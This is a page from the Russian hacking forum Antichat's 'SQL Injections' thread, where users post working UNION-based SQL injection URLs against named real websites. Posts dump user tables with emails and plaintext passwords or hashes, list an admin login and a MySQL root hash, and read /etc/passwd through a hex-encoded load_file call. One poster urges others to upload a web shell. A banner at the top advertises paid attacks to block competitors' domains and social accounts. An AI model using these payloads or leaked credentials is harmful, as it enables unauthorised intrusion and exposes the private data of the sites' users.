Форум АНТИЧАТ - SQL Инъекции

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
SQL Инъекции

Страница 612 из 1242

612

Опции темы

Поиск в этой теме

Опции просмотра

#6111

28.07.2008, 11:54

MaSTeR GэN

Участник форума

Регистрация: 23.05.2008

Сообщений: 121

Провел на форуме:
305110

Репутация: 133

Отправить сообщение для MaSTeR GэN с помощью ICQ

fat-cat.co.uk

Код:

http://fat-cat.co.uk/fatcat/artistInfo.php?id=-52+UNION+SELECT+1,concat_ws(0x1,id,username,password,email),3,4,5,6,7+FROM+users%20where%20id=2/*

Таблица users:

Код:

2iwantiwantiwantSeiji25xdl@tedra.net
3alex_teagundamalex_tea@r107.co.uk
......................................................................
......................................................................
1442chuppethxq92EAA932chuppeth@gmail.com
1443FemyanaehoowngIPouCm641lerik66@mymail-in.net

хеш текушева пользователя mysql.user и вывод file_priv

Код:

http://fat-cat.co.uk/fatcat/artistInfo.php?id=-52+UNION+SELECT+1,concat_ws(0x1,file_priv,user,password),3,4,5,6,7+from+mysql.user where user=left(user(),locate(0x40,user())-1)/

file_priv нет

Код:

Nfatcat*B4DE6388421C75A631A6BADDCC27DAEE58D0122A

sublackwell.co.uk

Код:

http://www.sublackwell.co.uk/gallery.php?id=2+and+substring(version(),1,1)=5--

Mysql 5 версии таблиц интересных не нашел (

#6112

28.07.2008, 18:07

nicusor

Участник форума

Регистрация: 19.03.2008

Сообщений: 108

Провел на форуме:
1357043

Репутация: 137

http://moldagrotehnica.md

user() = agro@localhost
version() = 4.1.14
database() = moldagrotehnica_md

http://moldagrotehnica.md/votShowRes.php?id_vot=-38/**/union/**/select/**/1,2,3,4/**/from/**/glt_voting_result/**/limit/**/1,1/*

http://moldagrotehnica.md/votShowRes.php?id_vot=-38/**/union/**/select/**/1,2,3,count(*)/**/from/**/glt_users/**/limit/**/0,1/*

count(*) from glt_users = 5

узнал названия и префикс таблиц когда отправил данные в vote.php
Query INSERT INTO `glt_voting_result` failed

админка на первой странице .. но не смог подобрать поля в базе

#6113

28.07.2008, 19:55

~~N1K70~~

Banned

Регистрация: 02.01.2008

Сообщений: 195

Провел на форуме:
523549

Репутация: 301

Отправить сообщение для N1K70 с помощью ICQ

Код:

http://www.pioneerhall.org/ugroups.php?UID=-1+UNION+SELECT+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15--

user - pioneer_mainU@localhost
database - 5.0.51a-
version - pioneer_main
=\

#6114

28.07.2008, 20:00

MaSTeR GэN

Участник форума

Регистрация: 23.05.2008

Сообщений: 121

Провел на форуме:
305110

Репутация: 133

Prospect-magazine.co.uk
User: prospect@localhost
Version:4.1.20
Database: prospect_master

Код:

http://www.prospect-magazine.co.uk/list.php?category=131 UNION SELECT 1,2,3,4,5,6,7,8,9,10,concat_ws(0x1,Id,Email,Password),12,13 FROM Users where Id=90001/*&allIssues=1

содержание таблицы Users

Код:

1webadmin743@admin.comT91P73X
***************************
90001hugh@salinghall.comboutons

итого логин пасс к админке

user:webadmin743@admin.com
pass:T91P73X

Последний раз редактировалось MaSTeR GэN; 28.07.2008 в 20:03..

#6115

28.07.2008, 20:36

~~otmorozok428~~

Banned

Регистрация: 19.10.2007

Сообщений: 152

Провел на форуме:
557623

Репутация: 415

Цитата:

Сообщение от Tigger

http://www.fondsk.ru/article.php?id=-1143+union+select+1,2,3,4,5,concat_ws(0x2f,version (),user(),database()),7,8,9,10,11,12,13,14,15,16,1 7,18,19,20,21,22,23,24,25/*
5.0.45-log/u32888@10.10.223.204/u32888
Все таблицы:
http://www.fondsk.ru/article.php?id=-1143+union+select+1,2,3,4,5,table_name,7,8,9,10,11 ,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+in formation_schema.tables/*
Все колонки:
http://www.fondsk.ru/article.php?id=-1143+union+select+1,2,3,4,5,column_name,7,8,9,10,1 1,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+i nformation_schema.columns/*

Внесу некоторые коррективы:

Цитата:

http://www.fondsk.ru/article.php?id=-1143+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19,20,21,22,23,24,25,26--

, т.е. столбцов 26, а не 25.

Список таблиц и столбцов получается так:

Код:

http://www.fondsk.ru/article.php?id=-1143+union+select+1,2,3,4,5,table_name,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+information_schema.tables+limit+0,1--
http://www.fondsk.ru/article.php?id=-1143+union+select+1,2,3,4,5,column_name,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+information_schema.columns+where+table_name+like+char(112,101,114,115,111,110)+limit+0,1--

Так же имеются и другие дырявые скрипты:

Код:

http://www.fondsk.ru/article.php?id=1505+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--
http://www.fondsk.ru/page.php?id=6+union+select+1,2,3,4,5,6,7,8--
http://www.fondsk.ru/articlelist.php?section_id=2+union+select+1--
http://www.fondsk.ru/articlelist.php?&section_id=14&mode=brief'
http://www.fondsk.ru/author.php?id=160'
http://www.fondsk.ru/articlelist.php?author_id=6'

Список таблиц-столбцов:

Код:

**********************

	article

----------------------

	id
	section_id
	author1_id
	author2_id
	author3_id
	title
	subtitle
	keywords
	body
	flag_hidden
	date_publish_ru
	date_publish_en
	date_create
	descript
	imgurl
	flag_hidden_mui
	tik_id
	tags

**********************

	author

----------------------

	id
	lastname
	firstname
	secondname
	fio
	prefix
	suffix
	title
	bio

**********************

	comment

----------------------

	id
	article_id
	comment_id
	author
	email
	subject
	body
	flag_hidden
	flag_approved
	date_publish
	ip	

**********************

	content	

----------------------

	id
	title
	subtitle
	body
	createdate
	type
	parentid

**********************

	page

----------------------

	id
	name
	keywords
	flag_hidden
	body
	sequence
	url
	flag_hidden_mui

**********************

	partner	

----------------------

	id
	name
	url
	flag_hidden
	sequence
	flag_hidden_mui
	bannerurl

**********************

	partner_article	

----------------------

	id
	partner_id
	title
	subtitle
	url
	flag_hidden
	hits
	sequence
	author	

**********************

	person

----------------------

	id
	login
	firstname
	secondname
	lastname
	newlastname
	birthdate
	group_id_before
	group_id_after
	degree_id
	married
	sex
	jobplace
	jobplace_show
	industry_id
	position
	position_show
	jobsite
	phoned
	phoned_show
	phoner
	phoner_show
	phonem
	phonem_show
	email
	email_show
	homepage
	country_id
	city
	address
	address_show
	alive
	status
	interest_prof
	hobby
	comment
	admin_comment
	children
	webpage	

**********************

	section	

----------------------

	id
	name
	keywords
	sequence
	flag_hidden
	flag_hidden_mui
	type
	imgurl

**********************
	
	stat

----------------------

	tm
	ip
	useragent
	url

**********************

	subscriber

----------------------

	id
	email
	flag_hidden
	activationcode
	periodicity
	flag_hidden_mui

**********************

	subscription

----------------------

	id
	dtstart
	dtend
	status
	dtlaunch
	mailsent
	flag_hidden_mui
	periodicity

**********************

	tik

----------------------

	id
	name
	subtitle
	url

**********************

#6116

29.07.2008, 06:30

sabe

Постоянный

Регистрация: 16.03.2007

Сообщений: 380

Провел на форуме:
1404552

Репутация: 568

Отправить сообщение для sabe с помощью ICQ

Отправить сообщение для sabe с помощью AIM

Отправить сообщение для sabe с помощью Yahoo

охх.. лето лето.. .DE ты? ))

Dfki.de - PR 7

Цитата:

http://www.dfki.de/lt/job_details.php?id=-1+union+select+1,2,3,concat_ws(0x3a,version(),user (),database()),5,6/*

Springer-sbm.de - PR 7

Цитата:

http://www.springer-sbm.de/index.php?id=291+union+select+unhex(hex(version()) )/*

Gfbv.de - PR 6

Цитата:

http://www.gfbv.de/report.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,unhex(hex(version())),18,19,20,21,22,23,24,25, 26,27,28,29,30,31/*

Последний раз редактировалось sabe; 29.07.2008 в 06:55..

#6117

29.07.2008, 13:54

Cennarios

Участник форума

Регистрация: 13.07.2008

Сообщений: 101

Провел на форуме:
346497

Репутация: 303

Отправить сообщение для Cennarios с помощью ICQ

http://www.vashstile.ru/profile.php?id=-1+union+select+1,2,3,4,concat(username,0x3a,passwo rd,0x3a,id),6,7,8,9,10+from+users+limit+63,70/*

Дешевый модератор бесполезного форума
login: Admin
pass: 12345678
Пленный сайт...

#6118

29.07.2008, 16:13

Snap

Познающий

Регистрация: 05.02.2007

Сообщений: 71

Провел на форуме:
423288

Репутация: 82

Отправить сообщение для Snap с помощью ICQ

http://www.garem.ru/
Сайт проституток и знакомств если правильно понял.

http://www.garem.ru/act.php?id=-13+union+select+1,2,concat(table_name,char(58),col umn_name,char(58),table_schema),4,5,6,7,8,9,10,11, 12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 ,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,4 5,46,47,48,49,50,51,52+from+information_schema.col umns+limit+0,1/*

Сорри времени на разбор небыло да и кому интересно будет там осталось ток таблици узнать.

#6119

29.07.2008, 19:22

sabe

Постоянный

Регистрация: 16.03.2007

Сообщений: 380

Провел на форуме:
1404552

Репутация: 568

Behindthename.com - PR 6

Цитата:

http://www.behindthename.com/bb/arcview.php?id=99999999999+union+select+1,2,3,4,5, 6,version(),8,9,10,11,12,13,14,15,16,17,18/*&board=gen

4 ветка..

Цитата:

http://www.behindthename.com/bb/arcview.php?id=99999999999+union+select+1,2,3,4,5, 6,concat_ws(0x3a,user,password),8,9,10,11,12,13,14 ,15,16,17,18+from+mysql.user/*&board=gen

рут..

Цитата:

http://www.behindthename.com/bb/arcview.php?id=99999999999+union+select+1,2,3,4,5, 6,load_file(0x2F6574632F706173737764),8,9,10,11,12 ,13,14,15,16,17,18/*&board=gen

пассы...
пробуйте залить шелл)

Arcoiris.tv - PR 5

Цитата:

http://www.arcoiris.tv/modules.php?id=-9268+union+select+1,2,3,4,5,6,7,8,version(),10,11, 12,13,14,15,16,17/*&name=Unique

Цитата:

http://www.arcoiris.tv/modules.php?id=-9268+union+select+1,2,3,4,5,6,7,8,unhex(hex(concat _ws(0x3a,username,password,0x766974616c))),10,11,1 2,13,14,15,16,17+from+users/*&name=Unique

подобрал таличку.. вывод в сорсе.)

Inst.ru - PR 5

Цитата:

http://www.inst.ru/catalog.php?id=-15+union+select+1,version(),3,4,5,6/*

Freenameastar.com - PR 3

Цитата:

http://www.freenameastar.com/viewstar.php?id=-231237+union+select+1,2,3,4,5,6,7,version(),9,10,1 1,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26/*

Jets.gaiva.ru

Цитата:

http://jets.gaiva.ru/index.php?id=read&name=effective&alt=3&E_ID=999999 +union+select+version()/*

Последний раз редактировалось sabe; 29.07.2008 в 20:22..

#6120

29.07.2008, 19:31

Calcutta

Постоянный

Регистрация: 06.08.2007

Сообщений: 347

Провел на форуме:
2584838

Репутация: 770

Отправить сообщение для Calcutta с помощью ICQ

http://www.nord-east.ru/index.php?id=7+union+select+1,concat_ws(0x3a,table _name),3,4+from+information_schema.tables+limit+0, 1--

интересных таблиц не нашел -(

Страница 612 из 1242

612

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая	k00p3r	Чужие Статьи	0	13.06.2005 11:26
SQL инъекция и Oracle, часть 2	k00p3r	Чужие Статьи	0	13.06.2005 11:24
Sql инъекция и Oracle, часть первая	k00p3r	Чужие Статьи	0	13.06.2005 11:23
Внедрение Sql кода с завязанными глазами	k00p3r	Чужие Статьи	0	12.06.2005 20:48
SQL Injection в Oracle	k00p3r	Чужие Статьи	0	12.06.2005 12:41

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход